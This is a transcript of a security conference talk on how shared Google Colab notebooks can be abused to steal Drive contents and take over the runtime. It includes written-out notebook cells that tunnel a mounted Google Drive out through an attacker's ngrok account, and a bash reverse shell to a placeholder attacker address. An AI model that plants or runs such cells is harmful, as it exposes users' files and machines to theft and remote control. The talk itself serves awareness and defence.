Let me introduce Antonio. I'd like to welcome to the stage Antonio Piazza, who's going to present Careful Who You Colab With: Abusing Google Colaboratory. Antonio Piazza, hailing from Cleveland, Ohio, USA, is a Purple Team Leader and Offensive Security Engineer at NVIDIA. Following his stint as a U.S. Army Human Intelligence Collector (you and I should talk after your talk), he worked as a defense contractor operator on an NSA Red Team, so he's intimately familiar with spies, hacking, and nerd stuff. Antonio is passionate about all things related to macOS security and hacking, and thus spends his days researching macOS internals and security, as well as writing free open-source Red Team tools for use in the defense against the dark arts. Oh, that sounds cool. As of late, he has been planning to implement machine learning into Red Teaming with his NVIDIA colleagues. So, please welcome Antonio.

Sorry, I have to give you access, I guess. Oh, I see. Sorry, I was looking for your handle. There we go. Okay, you have access. All right. Make sure to pick up a microphone to get megaphone access. Just point your pointer at one of the microphones, and it'll change from a circle to a funny-looking icon, and then left-click to pick it up. Is that right? Left-click? I don't know why my icon's not changing. He has megaphone enabled, so he's good. Okay, yeah, I can learn how to use these controls. That'd be wonderful.

Okay, thanks everyone. I really appreciate you coming and listening to this. Can everyone hear me okay before I start going on? This is my first time formally doing anything in VR, so hopefully it goes well. I'm going to be looking at my slides a lot, so yell at me if something happens.

So anyway, when I started this research, I was toying around with the idea of creating a startup that would provide a service to artists, allowing them to gain inspiration through AI. That was the premise of the startup idea I had, and I wanted to start with music, because that's where my passion is. The idea was that a musician who needs inspiration for writing their next song could submit some samples of their music, or of songs they wish to emulate or gain inspiration from, and the AI would then throw together a bunch of riffs similar to, but not the same as, the style the user submitted. I started using Google Colaboratory, getting involved in the AI art and music community, including the Databots Discord channel, and reading white papers concerning SampleRNN. I didn't have a great GPU in my own computer at the time, and they were super expensive and hard to get (not anymore, thanks to working at NVIDIA), so some AI researchers in the community directed me to Google Colaboratory. I started playing with it and found it to be a great tool for AI collaboration, and you get a free GPU, which is really nice. So this research didn't start with anything to do with security. Next slide, please.

Then a researcher in the Databots Discord got me involved in another project called OpenAI Jukebox. This platform allows the user to train the AI by feeding it a song, and the AI will give you, in return, a song where the artist sings the lyrics you provide. So I was playing around and trying to get Elvis to sing the lyrics of Sir Mix-a-Lot's Baby Got Back in the style of Suspicious Minds. Next slide, please.
And a researcher, Brockaloo, from the OpenAI Jukebox project helped me out by tweaking some of the configurations in my Google Colab file, which he shared with me via this Discord message. I opened the file in Colab as normal, and again, as normal, I began the process of mounting my Google Drive in Colab. And this is when it hit me. When I mounted my Google Drive, this prompt came up on the screen. I don't know if you can read it, but it says: this notebook is requesting access to your Google Drive files. Granting access to Google Drive will permit code executed in the notebook to modify files in your Google Drive. Make sure to review notebook code prior to allowing this access. And that's where the security research began. So, next slide, please.

And again, the talk is titled Careful Who You Colab With: Abusing Google Colaboratory. Next slide, please.

And I am Antonio Piazza. I go by Antman1P on the Twitters. I'm an offensive security engineer. Most of my security experience is strictly red teaming: I've worked at Zoom, Box, the Cleveland Clinic, and on an NSA red team as a defense contractor, and now I am the purple team leader at NVIDIA on the threat operations team. As for that ODIN logo down there, I have some stickers; if you're here at DEF CON, I'll be down in the AI Village after this talk, and I'll hand them out if you want some. I'm also in my final course of the Master of Science in Information Security Engineering program at the SANS Technology Institute. I'm a father of five, a husband, and again, I love music. Next slide, please.

So the agenda here is going to be pretty brief. We're going to discuss what Google Colaboratory is, because I'm sure some of you don't know and some of you might be familiar. We're going to talk about how we can abuse Google Colab, and then we're going to conclude. Next slide, please.

So what is Google Colaboratory? I'll let Google define it, because I think they describe it best. Colaboratory, or Colab for short, is a product from Google Research. Colab allows anybody to write and execute arbitrary Python code through the browser, and is especially well suited to machine learning, data analysis, and education. More technically, Colab is a hosted Jupyter Notebook service that requires no setup to use, while providing access free of charge to computing resources, including GPUs. Colab resources are not guaranteed and not unlimited, and the usage limits sometimes fluctuate. If you're interested in having reliable access and better resources, you can purchase Colab Pro, which is, I think, about $50 a month. What's the difference between Jupyter and Colab? Jupyter is the open-source project on which Colab is based. Colab allows you to use and share Jupyter Notebooks with others without having to download, install, or run anything. So that's the example I gave of Brockaloo sharing a Colab file with me: he was actually sharing a Jupyter Notebook file. Next slide, please.

How is Colab normally used? You can write your own notebooks, which are stored in your Google Drive. Basically, you write Python code in a Jupyter Notebook cell, and you execute the cells by pushing the execute button. When you open or start a notebook, you connect it to a Colab runtime, which is where your GPU and other resources spin up and start running, and you may also connect your notebook to your Google Drive.
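To make that workflow concrete, here is a minimal sketch of what the opening cells of a typical notebook tend to look like. The drive.mount call and the bang-prefixed shell shortcuts are standard Colab and IPython features; the specific package, repository, and mount path below (librosa, the OpenAI Jukebox repo, /content/drive) are just illustrative choices, not anything prescribed in the talk.

```python
# Typical opening cells of a Colab notebook (each block below would be its own cell).

# Connect the notebook to your Google Drive; this is the step that pops up the
# "this notebook is requesting access to your Google Drive files" prompt.
from google.colab import drive
drive.mount('/content/drive')

# Bang (!) commands run shell commands inside the Colab runtime VM.
!pip install librosa                              # install a dependency with pip
!git clone https://github.com/openai/jukebox.git  # clone a Git repo into the runtime
!ls /content/drive/MyDrive                        # browse the mounted Drive
```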
So in the slide here, in the picture, I've got arrows pointing to a Jupyter cell, and you can see the little black play button, which is how you run a cell, and then in the upper right-hand corner it's showing the resource usage for your runtime. Next slide, please.

How is Colab normally used, continued: you can import Python libraries just as you normally would in Python, you can install dependencies with pip, and you can clone Git repos, all from these Jupyter Notebook cells. Next slide, please.

You also have a Colab terminal. Once connected to the Colab runtime, you have a terminal that you can use to run shell commands, and once connected to Drive, you can navigate the connected Google Drive file system. A common question: where is my code executed, and what happens to my execution state if I close the browser window? The code is executed in a virtual machine private to your account. Virtual machines are deleted when idle for a while, and have a maximum lifetime enforced by the Colab service. I haven't sat down and tried to figure out what that time is, but that's something I'll probably do in the future; it seems to last a while, as long as you're active. Next slide, please.

Finally, I want to touch on system aliases. Jupyter has a number of system aliases, basically command shortcuts, for common operations such as ls, cat, ps, and kill, just your normal *nix commands. You can execute these from a Jupyter Notebook cell by adding the bang, the exclamation point, before the command, so !ls will run the ls command. Next slide, please.

All right, so how is this abusable? Let's recap. If I'm an adversary and I share a Colab file, a Jupyter Notebook, with someone, and they choose to use my file, they must mount their Google Drive and execute it. So that's key, right? They would be executing the malicious code I sent them. The adversary could potentially access all of the contents of a victim's Google Drive and exfiltrate anything they choose at that point. The adversary could edit the victim's Colab files to create backdoors that might in turn exploit other users the victim collaborates with. The adversary can also have a reverse shell on the Colab virtual machine in the runtime we're talking about. Is there a possibility to do a VM escape? Maybe. All of this could be as simple as sending a phishing email with a link to a malicious Colab file, or sending a link to a malicious Colab file in an AI community Discord server, just like the ones I hang out in, and kind of the way that Brockaloo shared the file with me. I've got to say, the one he shared with me was not malicious, by the way. I scared him when he saw these slides; he thought, oh my God, did I send you something malicious? I'm like, no, no, no, that just got my brain working like an adversary. So you can hide malicious code in Jupyter cells, and you can hide it in Git repos, since you can clone Git repos into a Jupyter notebook. There are a number of ways. Next slide, please.

So, for a clear understanding of what an attacker might have access to if they successfully gain access to a victim's Colab runtime or their Google Drive, here are the permissions that one grants when mounting a Google Drive for a Colab session. If you're having a hard time seeing these, I can read them real quick: see, edit, create, and delete all of your Google Drive files. View the photos, videos, and albums in your Google Photos. Retrieve mobile client configuration and experimentation.
View Google people information, such as profiles and contacts, basically all the contacts you have in your Google account, including from your phone or your Gmail. And see, edit, create, and delete any of your Google Drive documents. Next slide, please.

To see what an attacker might do, we can take a look at MITRE ATLAS. ATLAS stands for Adversarial Threat Landscape for Artificial-Intelligence Systems. It's a knowledge base of adversary tactics, techniques, and case studies for machine learning systems based on real-world observations, demonstrations from machine learning red teams and security groups, and the state of what's possible from academic research. ATLAS is modeled after the MITRE ATT&CK framework, which people are commonly more familiar with, and its tactics and techniques are complementary to those in MITRE ATT&CK. So how can an attacker do this? Well, for initial access, we discussed phishing the AI or ML research community via email or Discord servers. MITRE ATLAS has a machine learning supply chain compromise technique under the initial access tactic, so maybe we could add a sub-technique there for Jupyter Notebook sharing. There's also user execution under the execution tactic: an attacker might hide a backdoor in a Jupyter cell, or maybe hide a backdoor in a Git repo that the notebook clones. Next slide, please.

This is an example of hiding malicious code in Jupyter Notebook cells. The code on the left will give an adversary access to the victim's Google Drive. If an adversary shared this notebook, a victim might easily recognize that this is not AI/ML code; the one on the left is all just for an adversary getting access to Google Drive. But some of the AI and ML notebooks are quite large. As you can see on the right, that's not even the whole thing, and I zoomed out as far as possible to take that screenshot. An adversary might be able to hide the malicious bits within normal machine learning code. The image on the right is just one small piece from a Colab project that an AI community member shared with me. There's nothing malicious in there; it's just an example of how much code there is that an adversary could hide malicious cells and malicious code in. Next slide, please.

Okay, so this is the example of the malicious code by the numbers. Imagine you receive a link to a Colab file and you open it. If you run all of this, you will give the sender access to all of your Google Drive files via ngrok. The first thing the code does is have the victim mount their Google Drive, and again, this is normal behavior for all Colab files: in order to persist and store the data created from running one of these, you have to store it somewhere, and when you're in the cloud, that somewhere is your mounted Drive. In the next step, you wget the ngrok tarball and untar it. The third step is to register the attacker's ngrok API key. It's a bit dangerous for an attacker to hard-code an API key, but an attacker can always change it when they're done pillaging, or if they're unsuccessful with the attack, so it's not too bad. Step four is to start a Python server on a specified port, like 9999 in this case, and then run ngrok on the same port in step five. Next slide, please.
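To make those five steps concrete, here is a rough sketch of what the malicious cells might look like. This is not the exact code from the slide: the ngrok download URL and authtoken are placeholders, the port just mirrors the 9999 from the example, and the ngrok config syntax shown is the v3 agent's, which may differ from whatever version was used in the demo.

```python
# Sketch of the five-step Drive exfiltration notebook; placeholders, not the talk's exact code.
import subprocess

NGROK_TARBALL_URL = 'https://example.com/ngrok-stable-linux-amd64.tgz'  # placeholder: real link is on ngrok.com/download
NGROK_AUTHTOKEN   = 'ATTACKER_AUTHTOKEN'                                # placeholder: attacker's (burnable) ngrok key

# 1. Victim mounts their Google Drive, exactly as a benign notebook would.
from google.colab import drive
drive.mount('/content/drive')

# 2. Download and unpack the ngrok agent inside the Colab runtime VM.
!wget -q -O ngrok.tgz $NGROK_TARBALL_URL
!tar -xzf ngrok.tgz

# 3. Register the attacker's ngrok authtoken.
!./ngrok config add-authtoken $NGROK_AUTHTOKEN

# 4. Serve the mounted Drive over HTTP on an arbitrary port (9999 here),
#    backgrounded so the next cell can run.
subprocess.Popen(['python3', '-m', 'http.server', '9999', '--directory', '/content/drive'])

# 5. Tunnel that port out through ngrok; the attacker grabs the public URL
#    from their ngrok dashboard and browses the victim's Drive from anywhere.
subprocess.Popen(['./ngrok', 'http', '9999'])
```

The point of the sketch is how unremarkable these cells look when sitting next to ordinary notebook setup code.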
So this next one is a video demo. I don't know, were you able to get the videos from this presentation running? I don't know if that problem was solved. I don't know if anybody can hear me. It should be running right now. Oh, it's running. Okay. I can't see it, but I'll just go ahead.

So the victim, again, will run the Colab file and mount their drive. You can't quite see it because it's off screen, but I'm picking my Gmail account and allowing the Drive access, as I showed in the image earlier, and now I could navigate the file system on the left if I wanted. Then I'm installing Python requests; I don't really need it here, but I want to show how you can use pip if needed. I do a pwd to show the current location in the Google Drive file system, and then I curl ifconfig.me to show my cloud VM's IP address. Then wget to download ngrok, tar to untar ngrok, run the ngrok config command to add my API key, run the Python server to serve the Google Drive root directory, and run ngrok. And then, on the attacker side, the attacker goes to the ngrok agents page.

Is there a way to, like, tilt my view so I can look up and see the slides? I'm looking down. Yes, move your mouse forward. Oh, there it is. Okay. Oh, did something go wrong? Oh, no. No, no, you're okay. I think I'll just kind of keep going.

So on the attacker side, the attacker goes to the ngrok agents page, and you might have seen there that the IP address of the agent matched what I got from curling ifconfig.me. And then we're in. We can navigate the Google Drive file system and download whatever we want from the victim. What you're seeing there is an in-browser representation of the victim's Google Drive. Next slide, please.

Okay, so that was the example of being able to get into a victim's Google Drive, and this one is a reverse shell example. It's really two simple steps for this one: basically, mount the victim's Google Drive, and then do a bash TCP reverse shell to the adversary's C2 server IP address. I didn't show a video for this because it's just so simple, but you get the idea of what a reverse shell is going to look like. Next slide, please.
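For completeness, here is a minimal sketch of that two-step reverse shell variant, assuming a standard bash /dev/tcp reverse shell; ATTACKER_IP and port 4444 are placeholders for the adversary's C2 listener, which the talk does not specify.

```python
# Sketch of the two-step reverse shell notebook; C2 address and port are placeholders.

# 1. Victim mounts their Google Drive, same as any normal Colab notebook.
from google.colab import drive
drive.mount('/content/drive')

# 2. Bash TCP reverse shell from the Colab VM out to the attacker's listener
#    (the attacker would be waiting with something like: nc -lvnp 4444).
!bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
```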
Okay, so knowing all this, what is the problem? Quickly: GPUs are a little harder to find because of supply chain issues, and they're pretty expensive, whereas Colab is free and even Pro is cheap. AI and ML researchers are starting to use Colab more, and the education sector and universities especially are using similar cloud-based Jupyter Notebook runtime environments. And researchers are collaborating and sharing, right? This is a pretty exciting time, where someone like me, who's not super schooled in AI and ML, can get their start, because there's so much cool research going on, people are willing to share it, and you get to learn how to do all the crazy cool AI stuff. Where I think the problem comes in is that most AI and ML researchers and developers are not security experts. It's kind of like the beginning of software engineering, when nobody was really thinking about security. It took a while for that to change, and I think we're back at square one with AI and ML researchers. The good news is that security has been around for a while and we saw the mistakes that were made at the beginning of software engineering, so hopefully we can quickly jump in and start securing things in the machine learning and AI sector. And finally, phishing is easy, right? I've been on a lot of red teams, and it's a numbers game. If I send out 100 phish, I know I'm going to get at least one, as long as they all make it through your email filtering, and that's never really been a problem. So it's scary.

How can we fix it? Well, ML researchers and people who are collaborating should read the code someone shares with them. Let that Google Drive mount warning remind you every time: before I mount this, let me look through and make sure this code is good, that it's what I was expecting, and that there's nothing weird in there. And I know that's difficult, because again, in one of these notebooks it might be difficult to find that needle in the haystack, especially if the researcher doesn't know what to look for. So that's one thing: I think, as security experts, we should start educating machine learning and AI researchers on what bad looks like. This is me hopefully getting something out to the security community, and hopefully this will spread from the security community into the ML research and AI community, so start using your expertise to educate those folks on what bad looks like, so they can then search for it in their notebooks. Maybe develop a code-sharing plugin in Google Drive; maybe Google can do that, or the open-source community can. Next slide, please.

With that, thanks again. This is really cool, doing something for the first time in VR; hopefully it went smoothly for everyone else. And again, I hope you got something out of this, and please feel free to ask any questions. I know I'm probably out of time here, but hopefully I can answer some.

Do you think this problem should be fixed by Google, or do you think it should be up to the user, basically, to watch themselves and make sure they don't download any malicious code?

You know, it's funny, because I've heard that question before: basically, is this a problem that the users need to solve? Well, absolutely. But if you think about it, security education has been trying to push the responsibility onto the user, which ultimately it is in the end. But is that working? Are users listening? Especially if you're securing an enterprise or a corporate network, we would hope all the users would do their due diligence, but it just never turns out that way, right? I would love it if every person were super diligent when opening an email and never clicked on a link, but it just never happens. So yeah, I think it's always an end-user responsibility, but ultimately we have to do our part as well, as security experts. Should Google do anything? In my opinion, they should have more than just that warning. But I've submitted several things to Google; I don't try to pick on Google, but I use Google a lot, so I end up finding things. I've submitted things, and they're just like, oh, that works as normal, and I'm like, that doesn't seem like great security practice. But no, that's the response. So I don't have an expectation that Google will do anything. I wish they would, but I think ultimately we're going to have to rely on the open-source community to develop some plugins or, again, help educate people. Next slide, please.

I actually have one more slide. Sometimes I get... it's not really a question, but people want to hear the Baby Got Back thing with Elvis. I can play it if you want.
Well, I don't know if that went as smoothly as I hoped, but it's a work in progress. It gets pretty crazy at the end, when the AI starts singing in some alien language. It reminds me of the show Devs, when they had that weird background noise of the quantum computer speaking. It's kind of spooky. But anyway, any other questions? All right. Well, thanks a lot. Again, I really appreciate it.

Thank you, Antonio, for your presentation. We have to be careful, I guess, who we Colab with from here on out. I never thought of Jupyter Notebooks being used in that way. That's quite clever.